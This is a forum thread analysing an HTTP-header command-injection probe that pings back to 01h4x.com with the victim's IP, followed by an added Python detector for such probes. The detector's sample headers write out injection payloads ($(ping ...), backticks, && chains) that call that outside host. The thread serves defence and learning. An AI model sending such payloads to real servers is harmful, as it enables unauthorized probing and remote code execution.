Advisor

HTTP header remote code execution - help me learn

Hi everyone,

 

I hope someone cares to teach me what was tried in this HTTP header remote code execution attempt, and that others can also learn from this analysis.

Here is an example of the log:

image.png

The blurred info in the following image contains the external IP of my gateway:

image.png

 

Here is the capture opened in Wireshark. Notice that all the blurred fields contain the same external IP address as above:

image.png

So this is what I understand. 

echo aaaaaaaaaaa | base64 encodes the text aaa... in base64, which gives the result YWFhYWFhYWFhYWEK.

So all these tests will result in these:

ping YWFhYWFhYWFhYWEK-inject1-(my external IP).01h4x.com

ping YWFhYWFhYWFhYWEK-inject2-(my external IP).01h4x.com

ping YWFhYWFhYWFhYWEK-inject3-(my external IP).01h4x.com

ping YWFhYWFhYWFhYWEK-inject4-(my external IP).01h4x.com

 

Since they use inject1, inject2, inject3 and inject4, does it mean they are trying to see which HTTP header field it is possible to inject into? Meaning inject1 would mean it worked by using the Cookie field?

But maybe more important: did they manage to run the code "echo aaaaaaaaaa | base64" on the system as a test for further/later attacks? And also, by including the external IP address, do they know which servers on the Internet are vulnerable and pinging back to the domain 01h4x.com?

 

Maybe I'm totally wrong, but I hope someone cares to explain.

 

 

Admin

Yes, they are trying to see which field they can inject arbitrary code into, with the different hostnames and pings resulting in an activity they can track.
I imagine they could log both the DNS lookup (something unique, so it would definitely go back to their name servers and not be cached) and the actual ping to determine the level of success (a potential exfiltration channel), and of course the IP.
And yes, if this code executes at all, that is an issue.
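
The probing and call-back behaviour described in the question and in PhoneBoy's reply, as an added example (not code from the original thread): a small Python detector that picks the canary hostname out of raw request headers and out of DNS query names, decodes the base64 label, and correlates the inject<N> markers with the header each probe rode in. The sample headers and DNS queries are constructed, the $(...) and backtick substitution syntax is an assumption about how the real probe looked, and 203.0.113.10 stands in for the poster's external IP.

```python
"""Detect HTTP-header command-injection probes that phone home over DNS,
and correlate the inject<N> markers with the header each probe was sent in.

All sample data below is constructed for this example. The probe syntax
($(...) substitution, backticks) is an assumption about how the real
request looked, and 203.0.113.10 stands in for the poster's gateway IP.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed request headers in the shape the thread reconstructs.
SAMPLE_HEADERS = [
    "User-Agent: Mozilla/5.0 $(ping $(echo aaaaaaaaaaa|base64)-inject1-203.0.113.10.01h4x.com)",
    "Referer: http://203.0.113.10/`ping $(echo aaaaaaaaaaa|base64)-inject2-203.0.113.10.01h4x.com`",
    "Cookie: PHPSESSID=x; ping $(echo aaaaaaaaaaa|base64)-inject3-203.0.113.10.01h4x.com",
    "X-Forwarded-For: 198.51.100.7 && ping $(echo aaaaaaaaaaa|base64)-inject4-203.0.113.10.01h4x.com",
    "Accept: text/html",
]

# Constructed DNS query names (what a capture would show if one of the probes
# actually executed): only the inject3 marker resolves in this sample.
SAMPLE_DNS_QUERIES = [
    "YWFhYWFhYWFhYWEK-inject3-203.0.113.10.01h4x.com",
    "www.example.com",
]

# Callback hostname: <label>-inject<N>-<victim IP>.<attacker domain>.
# The label is either the literal $(echo ...|base64) in the raw request or
# its expanded base64 form once a shell has run it (as seen in DNS).
CANARY = re.compile(
    r"(?P<label>\$\(echo [^)]*\)|[A-Za-z0-9+/=]+)"
    r"-inject(?P<n>\d+)-"
    r"(?P<ip>(?:\d{1,3}\.){3}\d{1,3})\."
    r"(?P<domain>[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)"
)
ECHO_B64 = re.compile(r"\$\(echo (?P<text>[^)|]+?)\s*\|\s*base64\)")


@dataclass(frozen=True)
class Finding:
    source: str                    # "http" (raw probe) or "dns" (executed probe)
    header: Optional[str]          # header name for http findings
    inject_index: int
    victim_ip: str
    callback_domain: str
    label: str
    decoded_label: Optional[str]   # plaintext behind the label, if recoverable


def simulate_echo_base64(text: str) -> str:
    """Mirror `echo TEXT | base64`: echo appends a newline before encoding."""
    return base64.b64encode((text + "\n").encode()).decode()


def decode_label(label: str) -> Optional[str]:
    """Recover the plaintext behind a label, whether raw or already expanded."""
    m = ECHO_B64.fullmatch(label)
    if m:                          # raw probe: the shell has not run it yet
        return m.group("text")
    try:
        return base64.b64decode(label, validate=True).decode().rstrip("\n")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_http_header(line: str) -> Optional[Finding]:
    """Flag a 'Name: value' header line carrying the canary hostname."""
    name, sep, value = line.partition(":")
    if not sep:
        return None
    m = CANARY.search(value)
    if not m:
        return None
    return Finding("http", name.strip(), int(m.group("n")), m.group("ip"),
                   m.group("domain"), m.group("label"), decode_label(m.group("label")))


def scan_dns_query(qname: str) -> Optional[Finding]:
    """Flag a DNS query name that is a (possibly expanded) canary hostname."""
    m = CANARY.fullmatch(qname.rstrip("."))
    if not m:
        return None
    return Finding("dns", None, int(m.group("n")), m.group("ip"),
                   m.group("domain"), m.group("label"), decode_label(m.group("label")))


def correlate(headers: List[str], dns_queries: List[str]) -> Dict[int, Dict[str, object]]:
    """Map each inject<N> marker to the header it rode in, and record whether
    the matching DNS lookup was seen (i.e. whether the payload actually ran)."""
    probes = [f for f in map(scan_http_header, headers) if f]
    resolved = {f.inject_index for f in map(scan_dns_query, dns_queries) if f}
    return {
        p.inject_index: {"header": p.header, "executed": p.inject_index in resolved,
                         "callback_domain": p.callback_domain, "victim_ip": p.victim_ip}
        for p in probes
    }


if __name__ == "__main__":
    for idx, info in sorted(correlate(SAMPLE_HEADERS, SAMPLE_DNS_QUERIES).items()):
        print(f"inject{idx}: header={info['header']} executed={info['executed']}")
```

Only a marker that shows up in DNS (or in the pings) with the base64 already expanded proves that a shell ran the payload; the literal $(echo ...) in the access log shows only that the probe arrived. Running the block prints one line per marker; in the constructed data only inject3 (the Cookie header) shows as executed.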

Advisor

Thanks @PhoneBoy for confirming this. That's pretty clever of them, I would say. I searched for the code online and found this website:

image.png

Does it mean that the website dys-coaching.com was vulnerable to this specific attack? It's weird seeing it there as part of the website. In our case they used the GET method.

Edit1: I guess that it was only cached on the website, since the HTTP GET method can be cached on the server side. At least they tried on this website too.

 
